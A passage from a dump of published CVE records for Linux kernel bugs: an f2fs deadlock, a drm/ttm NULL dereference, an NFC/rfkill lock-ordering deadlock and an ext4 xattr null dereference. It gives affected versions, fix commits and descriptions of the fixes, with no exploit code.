"lessThan": "8bd6dff8b801abaa362272894bda795bf0cf1307",
"status": "affected",
"version": "95fa90c9e5a7f14c2497d5b032544478c9377c3a",
"versionType": "git"
},
{
"lessThan": "6c3bab5c6261aa22c561ef56b7365959a90e7d91",
"status": "affected",
"version": "95fa90c9e5a7f14c2497d5b032544478c9377c3a",
"versionType": "git"
},
{
"lessThan": "86a85a7b622e6e8dba69810257733ce5eab5ed55",
"status": "affected",
"version": "95fa90c9e5a7f14c2497d5b032544478c9377c3a",
"versionType": "git"
},
{
"lessThan": "ca8b201f28547e28343a6f00a6e91fa8c09572fe",
"status": "affected",
"version": "95fa90c9e5a7f14c2497d5b032544478c9377c3a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/compress.c",
"fs/f2fs/f2fs.h",
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid potential deadlock\n\nAs Jiaming Zhang and syzbot reported, there is potential deadlock in\nf2fs as below:\n\nChain exists of:\n \u0026sbi-\u003ecp_rwsem --\u003e fs_reclaim --\u003e sb_internal#2\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n rlock(sb_internal#2);\n lock(fs_reclaim);\n lock(sb_internal#2);\n rlock(\u0026sbi-\u003ecp_rwsem);\n\n *** DEADLOCK ***\n\n3 locks held by kswapd0/73:\n #0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: balance_pgdat mm/vmscan.c:7015 [inline]\n #0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: kswapd+0x951/0x2800 mm/vmscan.c:7389\n #1: ffff8880118400e0 (\u0026type-\u003es_umount_key#50){.+.+}-{4:4}, at: super_trylock_shared fs/super.c:562 [inline]\n #1: ffff8880118400e0 (\u0026type-\u003es_umount_key#50){.+.+}-{4:4}, at: super_cache_scan+0x91/0x4b0 fs/super.c:197\n #2: ffff888011840610 (sb_internal#2){.+.+}-{0:0}, at: f2fs_evict_inode+0x8d9/0x1b60 fs/f2fs/inode.c:890\n\nstack backtrace:\nCPU: 0 UID: 0 PID: 73 Comm: kswapd0 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_circular_bug+0x2ee/0x310 kernel/locking/lockdep.c:2043\n check_noncircular+0x134/0x160 kernel/locking/lockdep.c:2175\n check_prev_add kernel/locking/lockdep.c:3165 [inline]\n check_prevs_add kernel/locking/lockdep.c:3284 [inline]\n validate_chain+0xb9b/0x2140 kernel/locking/lockdep.c:3908\n __lock_acquire+0xab9/0xd20 kernel/locking/lockdep.c:5237\n lock_acquire+0x120/0x360 kernel/locking/lockdep.c:5868\n down_read+0x46/0x2e0 kernel/locking/rwsem.c:1537\n f2fs_down_read fs/f2fs/f2fs.h:2278 [inline]\n f2fs_lock_op fs/f2fs/f2fs.h:2357 [inline]\n f2fs_do_truncate_blocks+0x21c/0x10c0 fs/f2fs/file.c:791\n f2fs_truncate_blocks+0x10a/0x300 fs/f2fs/file.c:867\n 
f2fs_truncate+0x489/0x7c0 fs/f2fs/file.c:925\n f2fs_evict_inode+0x9f2/0x1b60 fs/f2fs/inode.c:897\n evict+0x504/0x9c0 fs/inode.c:810\n f2fs_evict_inode+0x1dc/0x1b60 fs/f2fs/inode.c:853\n evict+0x504/0x9c0 fs/inode.c:810\n dispose_list fs/inode.c:852 [inline]\n prune_icache_sb+0x21b/0x2c0 fs/inode.c:1000\n super_cache_scan+0x39b/0x4b0 fs/super.c:224\n do_shrink_slab+0x6ef/0x1110 mm/shrinker.c:437\n shrink_slab_memcg mm/shrinker.c:550 [inline]\n shrink_slab+0x7ef/0x10d0 mm/shrinker.c:628\n shrink_one+0x28a/0x7c0 mm/vmscan.c:4955\n shrink_many mm/vmscan.c:5016 [inline]\n lru_gen_shrink_node mm/vmscan.c:5094 [inline]\n shrink_node+0x315d/0x3780 mm/vmscan.c:6081\n kswapd_shrink_node mm/vmscan.c:6941 [inline]\n balance_pgdat mm/vmscan.c:7124 [inline]\n kswapd+0x147c/0x2800 mm/vmscan.c:7389\n kthread+0x70e/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe root cause is deadlock among four locks as below:\n\nkswapd\n- fs_reclaim\t\t\t\t--- Lock A\n - shrink_one\n - evict\n - f2fs_evict_inode\n - sb_start_intwrite\t\t\t--- Lock B\n\n- iput\n - evict\n - f2fs_evict_inode\n - sb_start_intwrite\t\t\t--- Lock B\n - f2fs_truncate\n - f2fs_truncate_blocks\n - f2fs_do_truncate_blocks\n - f2fs_lock_op\t\t\t--- Lock C\n\nioctl\n- f2fs_ioc_commit_atomic_write\n - f2fs_lock_op\t\t\t\t--- Lock C\n - __f2fs_commit_atomic_write\n - __replace_atomic_write_block\n - f2fs_get_dnode_of_data\n - __get_node_folio\n - f2fs_check_nid_range\n - f2fs_handle_error\n - f2fs_record_errors\n - f2fs_down_write\t\t--- Lock D\n\nopen\n- do_open\n - do_truncate\n - security_inode_need_killpriv\n - f2fs_getxattr\n - lookup_all_xattrs\n - f2fs_handle_error\n - f2fs_record_errors\n - f2fs_down_write\t\t--- Lock D\n - f2fs_commit_super\n - read_mapping_folio\n - filemap_alloc_folio_noprof\n - prepare_alloc_pages\n - fs_reclaim_acquire\t--- Lock A\n\nIn order to a\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:21.235Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8bd6dff8b801abaa362272894bda795bf0cf1307"
},
{
"url": "https://git.kernel.org/stable/c/6c3bab5c6261aa22c561ef56b7365959a90e7d91"
},
{
"url": "https://git.kernel.org/stable/c/86a85a7b622e6e8dba69810257733ce5eab5ed55"
},
{
"url": "https://git.kernel.org/stable/c/ca8b201f28547e28343a6f00a6e91fa8c09572fe"
}
],
"title": "f2fs: fix to avoid potential deadlock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71065",
"datePublished": "2026-01-13T15:31:21.235Z",
"dateReserved": "2026-01-13T15:30:19.646Z",
"dateUpdated": "2026-01-13T15:31:21.235Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71083 (GCVE-0-2025-71083)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
drm/ttm: Avoid NULL pointer deref for evicted BOs
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/ttm: Avoid NULL pointer deref for evicted BOs
It is possible for a BO to exist that is not currently associated with a
resource, e.g. because it has been evicted.
When devcoredump tries to read the contents of all BOs for dumping, we need
to expect this as well -- in this case, ENODATA is recorded instead of the
buffer contents.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 47a85604a761005d255ae38115ee630cc6931756 (git); Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 4b9944493c6d92d7b29cfd83aaf3deb842b8da79 (git); Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 3d004f7341d4898889801ebb2ef61ffca610dd6f (git); Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 5a81095d3e1b521ac7cfe3b14d5f149bace3d6e0 (git); Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < b94182b3d7228aec18d069cba56d5982e9bfe1b1 (git); Affected: 09ac4fcb3f255e9225967c75f5893325c116cdbe , < 491adc6a0f9903c32b05f284df1148de39e8e644 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/ttm/ttm_bo_vm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "47a85604a761005d255ae38115ee630cc6931756",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "4b9944493c6d92d7b29cfd83aaf3deb842b8da79",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "3d004f7341d4898889801ebb2ef61ffca610dd6f",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "5a81095d3e1b521ac7cfe3b14d5f149bace3d6e0",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "b94182b3d7228aec18d069cba56d5982e9bfe1b1",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
},
{
"lessThan": "491adc6a0f9903c32b05f284df1148de39e8e644",
"status": "affected",
"version": "09ac4fcb3f255e9225967c75f5893325c116cdbe",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/ttm/ttm_bo_vm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:45.717Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/47a85604a761005d255ae38115ee630cc6931756"
},
{
"url": "https://git.kernel.org/stable/c/4b9944493c6d92d7b29cfd83aaf3deb842b8da79"
},
{
"url": "https://git.kernel.org/stable/c/3d004f7341d4898889801ebb2ef61ffca610dd6f"
},
{
"url": "https://git.kernel.org/stable/c/5a81095d3e1b521ac7cfe3b14d5f149bace3d6e0"
},
{
"url": "https://git.kernel.org/stable/c/b94182b3d7228aec18d069cba56d5982e9bfe1b1"
},
{
"url": "https://git.kernel.org/stable/c/491adc6a0f9903c32b05f284df1148de39e8e644"
}
],
"title": "drm/ttm: Avoid NULL pointer deref for evicted BOs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71083",
"datePublished": "2026-01-13T15:34:46.974Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:45.717Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71079 (GCVE-0-2025-71079)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write
A deadlock can occur between nfc_unregister_device() and rfkill_fop_write()
due to lock ordering inversion between device_lock and rfkill_global_mutex.
The problematic lock order is:
Thread A (rfkill_fop_write):
rfkill_fop_write()
mutex_lock(&rfkill_global_mutex)
rfkill_set_block()
nfc_rfkill_set_block()
nfc_dev_down()
device_lock(&dev->dev) <- waits for device_lock
Thread B (nfc_unregister_device):
nfc_unregister_device()
device_lock(&dev->dev)
rfkill_unregister()
mutex_lock(&rfkill_global_mutex) <- waits for rfkill_global_mutex
This creates a classic ABBA deadlock scenario.
Fix this by moving rfkill_unregister() and rfkill_destroy() outside the
device_lock critical section. Store the rfkill pointer in a local variable
before releasing the lock, then call rfkill_unregister() after releasing
device_lock.
This change is safe because rfkill_fop_write() holds rfkill_global_mutex
while calling the rfkill callbacks, and rfkill_unregister() also acquires
rfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will
wait for any ongoing callback to complete before proceeding, and
device_del() is only called after rfkill_unregister() returns, preventing
any use-after-free.
The similar lock ordering in nfc_register_device() (device_lock ->
rfkill_global_mutex via rfkill_register) is safe because during
registration the device is not yet in rfkill_list, so no concurrent
rfkill operations can occur on this device.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 73a0d12114b4bc1a9def79a623264754b9df698e , < 2e0831e9fc46a06daa6d4d8d57a2738e343130c3 (git); Affected: 8a9c61c3ef187d8891225f9b932390670a43a0d3 , < e02a1c33f10a0ed3aba855ab8ae2b6c4c5be8012 (git); Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < ee41f4f3ccf8cd6ba3732e867abbec7e6d8d12e5 (git); Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < 6b93c8ab6f6cda8818983a4ae3fcf84b023037b4 (git); Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < 8fc4632fb508432895430cd02b38086bdd649083 (git); Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < f3a8a7c1aa278f2378b2f3a10500c6674dffdfda (git); Affected: 3e3b5dfcd16a3e254aab61bd1e8c417dd4503102 , < 1ab526d97a57e44d26fadcc0e9adeb9c0c0182f5 (git); Affected: 5ef16d2d172ee56714cff37cd005b98aba08ef5a (git); Affected: ff169909eac9e00bf1aa0af739ba6ddfb1b1d135 (git); Affected: 47244ac0b65bd74cc70007d8e1bac68bd2baad19 (git); Affected: c45cea83e13699bdfd47842e04d09dd43af4c371 (git); Affected: 307d2e6cebfca9d92f86c8e2c8e3dd4a8be46ba6 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/nfc/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2e0831e9fc46a06daa6d4d8d57a2738e343130c3",
"status": "affected",
"version": "73a0d12114b4bc1a9def79a623264754b9df698e",
"versionType": "git"
},
{
"lessThan": "e02a1c33f10a0ed3aba855ab8ae2b6c4c5be8012",
"status": "affected",
"version": "8a9c61c3ef187d8891225f9b932390670a43a0d3",
"versionType": "git"
},
{
"lessThan": "ee41f4f3ccf8cd6ba3732e867abbec7e6d8d12e5",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"lessThan": "6b93c8ab6f6cda8818983a4ae3fcf84b023037b4",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"lessThan": "8fc4632fb508432895430cd02b38086bdd649083",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"lessThan": "f3a8a7c1aa278f2378b2f3a10500c6674dffdfda",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"lessThan": "1ab526d97a57e44d26fadcc0e9adeb9c0c0182f5",
"status": "affected",
"version": "3e3b5dfcd16a3e254aab61bd1e8c417dd4503102",
"versionType": "git"
},
{
"status": "affected",
"version": "5ef16d2d172ee56714cff37cd005b98aba08ef5a",
"versionType": "git"
},
{
"status": "affected",
"version": "ff169909eac9e00bf1aa0af739ba6ddfb1b1d135",
"versionType": "git"
},
{
"status": "affected",
"version": "47244ac0b65bd74cc70007d8e1bac68bd2baad19",
"versionType": "git"
},
{
"status": "affected",
"version": "c45cea83e13699bdfd47842e04d09dd43af4c371",
"versionType": "git"
},
{
"status": "affected",
"version": "307d2e6cebfca9d92f86c8e2c8e3dd4a8be46ba6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/nfc/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.82",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.293",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.291",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.256",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.162",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:41.379Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2e0831e9fc46a06daa6d4d8d57a2738e343130c3"
},
{
"url": "https://git.kernel.org/stable/c/e02a1c33f10a0ed3aba855ab8ae2b6c4c5be8012"
},
{
"url": "https://git.kernel.org/stable/c/ee41f4f3ccf8cd6ba3732e867abbec7e6d8d12e5"
},
{
"url": "https://git.kernel.org/stable/c/6b93c8ab6f6cda8818983a4ae3fcf84b023037b4"
},
{
"url": "https://git.kernel.org/stable/c/8fc4632fb508432895430cd02b38086bdd649083"
},
{
"url": "https://git.kernel.org/stable/c/f3a8a7c1aa278f2378b2f3a10500c6674dffdfda"
},
{
"url": "https://git.kernel.org/stable/c/1ab526d97a57e44d26fadcc0e9adeb9c0c0182f5"
}
],
"title": "net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71079",
"datePublished": "2026-01-13T15:34:44.136Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:41.379Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68820 (GCVE-0-2025-68820)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
ext4: xattr: fix null pointer deref in ext4_raw_inode()
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: xattr: fix null pointer deref in ext4_raw_inode()
If ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),
iloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()
lacks error checking, this will lead to a null pointer dereference
in ext4_raw_inode(), called right after ext4_get_inode_loc().
Found by Linux Verification Center (linuxtesting.org) with SVACE.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 76c365fa7e2a8bb85f0190cdb4b8cdc99b2fdce3 , < b72a3476f0c97d02f63a6e9fff127348d55436f6 (git); Affected: f737418b6de31c962c7192777ee4018906975383 , < 3d8d22e75f7edfa0b30ff27330fd6a1285d594c3 (git); Affected: cf9291a3449b04688b81e32621e88de8f4314b54 , < 190ad0f22ba49f1101182b80e3af50ca2ddfe72f (git); Affected: 362a90cecd36e8a5c415966d0b75b04a0270e4dd , < b5d942922182e82724b7152cb998f540132885ec (git); Affected: eb59cc31b6ea076021d14b04e7faab1636b87d0e , < 5b154e901fda2e98570b8f426a481f5740097dc2 (git); Affected: c8e008b60492cf6fd31ef127aea6d02fd3d314cd , < ce5f54c065a4a7cbb92787f4f140917112350142 (git); Affected: c8e008b60492cf6fd31ef127aea6d02fd3d314cd , < b97cb7d6a051aa6ebd57906df0e26e9e36c26d14 (git); Affected: 6aff941cb0f7d0c897c3698ad2e30672709135e3 (git); Affected: 3bc6317033f365ce578eb6039445fb66162722fd (git); Affected: 836e625b03a666cf93ff5be328c8cb30336db872 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ext4/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b72a3476f0c97d02f63a6e9fff127348d55436f6",
"status": "affected",
"version": "76c365fa7e2a8bb85f0190cdb4b8cdc99b2fdce3",
"versionType": "git"
},
{
"lessThan": "3d8d22e75f7edfa0b30ff27330fd6a1285d594c3",
"status": "affected",
"version": "f737418b6de31c962c7192777ee4018906975383",
"versionType": "git"
},
{
"lessThan": "190ad0f22ba49f1101182b80e3af50ca2ddfe72f",
"status": "affected",
"version": "cf9291a3449b04688b81e32621e88de8f4314b54",
"versionType": "git"
},
{
"lessThan": "b5d942922182e82724b7152cb998f540132885ec",
"status": "affected",
"version": "362a90cecd36e8a5c415966d0b75b04a0270e4dd",
"versionType": "git"
},
{
"lessThan": "5b154e901fda2e98570b8f426a481f5740097dc2",
"status": "affected",
"version": "eb59cc31b6ea076021d14b04e7faab1636b87d0e",
"versionType": "git"
},
{
"lessThan": "ce5f54c065a4a7cbb92787f4f140917112350142",
"status": "affected",
"version": "c8e008b60492cf6fd31ef127aea6d02fd3d314cd",
"versionType": "git"
},
{
"lessThan": "b97cb7d6a051aa6ebd57906df0e26e9e36c26d14",
"status": "affected",
"version": "c8e008b60492cf6fd31ef127aea6d02fd3d314cd",
"versionType": "git"
},
{
"status": "affected",
"version": "6aff941cb0f7d0c897c3698ad2e30672709135e3",
"versionType": "git"
},
{
"status": "affected",
"version": "3bc6317033f365ce578eb6039445fb66162722fd",
"versionType": "git"
},
{
"status": "affected",
"version": "836e625b03a666cf93ff5be328c8cb30336db872",
